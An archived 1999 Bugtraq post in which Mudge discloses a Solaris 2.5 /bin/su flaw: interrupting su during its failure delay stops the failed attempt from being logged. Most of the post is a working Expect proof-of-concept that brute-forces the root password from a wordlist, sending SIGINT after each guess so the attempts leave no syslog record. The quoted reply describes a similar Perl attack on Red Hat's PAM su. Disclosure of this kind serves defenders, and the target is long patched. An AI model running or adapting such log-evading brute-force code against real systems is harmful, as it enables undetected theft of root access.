Solaris 2.5 /bin/su [was: vulnerability in su/PAM in redhat]

From: Dr. Mudge (mudgeat_private)
Date: Thu Jun 10 1999 - 12:13:06 PDT

  • Next message: Aleph One: "Re: Exploit in the newest AIM 2.0"

    The same sort of problem existed in solaris /bin/su on 2.5 and below.
    The comments in the quick proof of concept sploit below should explain
    further [heh - almost as high a comment/code ratio as Hobbit's netcat
    source :) ].
    -----SNIP SNIP-----
    #!/usr/local/bin/expect --
    # A quick little sploit for a quick round of beers :) mudgeat_private
    # This was something that had been floating around for some time.
    # It might have been bitwrior that pointed out some of the oddities
    # but I don't remember.	
    # It was mentioned to Casper Dik at some point and it was fixed in
    # the next rev of Solaris (don't remember if the fix took place in
    # 2.5.1 or 2.6 - I know it is in 2.6 at least).
    # What happened was that the Solaris 2.5 and below systems
    # had /bin/su written in the following fashion :
    #    attempt to SU
    #          |
    #     succesfull
    #    /          \
    #   Y            N
    #   |            |
    # exec cmd     sleep
    #                |
    #             syslog
    #                |
    #              exit
    # There were a few problems here - not the least of which was that they
    # did not bother to trap signals. Thus, if you noticed su taking a while
    # you most likely entered an incorrect password and were in the
    # sleep phase.
    # Sending a SIGINT by hitting ctrl-c would kill the process
    # before the syslog of the invalid attempt occured.
    # In current versions of /bin/su they DO trap signals.
    # It should be noted that this is a fairly common coding problem that
    # people will find in a lot of "security related" programs.
    #     .mudge
    if { ($argc < 1) || ($argc > 1) } {
      puts "correct usage is : $argv0 pwfile"
    set pwfile [open $argv "r"]
    log_user 0
    foreach line [split [read $pwfile] "\n"] {
      spawn su root
      expect "Password:"
      send "$line\n"
      # you might need to tweak this but it should be ok
      set timeout 2
      expect {
        "#" { puts "root password is $line\n" ; exit }
      set id [ exp_pid ]
      exec kill -INT $id
    -----SNIP SNIP------
    For more advisories check out:  [ That's L-zero-P-H-T ]
    On Wed, 9 Jun 1999, Tani Hosokawa wrote:
    > I was talking to some guy on IRC (st2) and he asked me to mention to
    > bugtraq (because he's not on the list) that the PAMified su that comes
    > with redhat has a slight hole. When you try to su to root (for example) if
    > it's successful, immediately gives you a shell prompt.  Otherwise, it
    > delays a full second, then logs an authentication failure to syslog.  If
    > you hit break in that second, no error, plus you know that the password
    > was bad, so you can brute force root's password.  I wrote a little
    > threaded Perl prog that tested it (with a 0.25 second delay before the
    > break) to attack my own password (with my password in the wordlist) and it
    > seemed to work just fine, even with my own password hundreds of words down
    > in the list, so it seems pretty predictable, as long as the server's under
    > very little load (else you get a delay no matter what, and it screws the
    > whole process by giving false negatives).
    > ---
    > tani hosokawa
    > river styx internet

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